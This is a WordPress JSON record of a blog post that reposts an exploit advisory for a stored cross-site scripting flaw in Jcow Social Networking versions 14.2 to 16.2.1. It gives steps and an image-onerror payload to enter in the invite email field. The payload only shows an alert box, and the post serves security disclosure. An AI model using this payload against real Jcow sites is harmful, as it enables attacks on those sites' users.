{"id":57041,"date":"2024-05-24T20:09:40","date_gmt":"2024-05-24T16:09:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178798\/jcow142-xss.txt"},"modified":"2024-05-24T20:09:40","modified_gmt":"2024-05-24T16:09:40","slug":"jcow-social-network-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jcow-social-network-cross-site-scripting\/","title":{"rendered":"Jcow Social Network Cross Site Scripting"},"content":{"rendered":"
\n
Jcow Social Network Cross Site Scripting<\/strong><\/a><\/dt>\n
Posted May 24, 2024<\/a><\/dd>\n
Authored by tmrswrr<\/a><\/dd>\n
\n

Jcow Social Networking versions 14.2 up to 16.2.1 suffer from a persistent cross site scripting vulnerability.<\/p>\n<\/dd>\n

tags<\/span> | exploit<\/a>, xss<\/a><\/dd>\n
SHA-256<\/span> | 8ff452224b5c44a006c708f69ef20ee895de407da9b77ccc1fefea5c2352b824<\/code><\/dd>\n
Download<\/a> | Favorite<\/a> | View<\/a><\/dd>\n<\/dl>\n
\n
# Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS 
# Date: 2024-05-23
# Author: tmrswrr
# Vendor Homepage: https:\/\/www.jcow.net\/
# Software Link: https:\/\/sourceforge.net\/projects\/jcow\/
# Tested : https:\/\/demo.jcow.net\/
# Version : 14.2 < 16.2.1
1) Login with any user Click invite place : https:\/\/127.0.0.1\/Jcow\/index.php?p=invite
2) Write in To (Email address) field your payload : \"><img src=x onerrora=confirm() onerror=confirm(1)>
3) After Send invitations you will be see alert button<\/p><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
Jcow Social Network Cross Site Scripting Posted May 24, 2024 Authored by tmrswrr Jcow Social Networking versions 14.2 up to 16.2.1 suffer from a persistent cross site scripting vulnerability. tags | exploit, xss SHA-256 | 8ff452224b5c44a006c708f69ef20ee895de407da9b77ccc1fefea5c2352b824 Download | Favorite | View # Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS # Date: …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57041","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57041","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57041"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57041\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57041"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57041"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57041"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}